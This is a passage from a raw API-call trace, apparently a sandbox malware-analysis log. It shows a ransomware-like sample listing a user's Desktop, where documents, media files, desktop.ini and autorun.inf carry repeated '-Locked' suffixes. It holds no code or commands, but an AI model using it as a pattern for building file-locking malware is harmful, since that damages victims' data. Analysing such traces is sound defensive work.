out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0305.365] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0305.365] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0305.366] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.366] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.366] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0305.366] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0305.367] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x365f2104, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365f2104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.367] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x365f2104, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365f2104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.367] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365d739a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x365d739a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365d739a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0305.367] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365ead97, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x365ead97, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365ead97, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0305.368] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0305.368] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365f3433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0305.368] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0305.369] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0305.369] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0305.369] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0305.369] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0305.369] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0305.370] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0305.370] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0305.370] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0305.370] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0305.371] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0305.371] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0305.371] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.371] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0305.371] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0305.372] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0305.372] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0305.372] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0305.372] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0305.373] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0305.373] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0305.373] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0305.373] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0305.374] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0305.374] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0305.374] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0305.374] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0305.374] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0305.375] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0305.375] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0305.375] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0305.376] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0305.376] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0305.376] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0305.377] 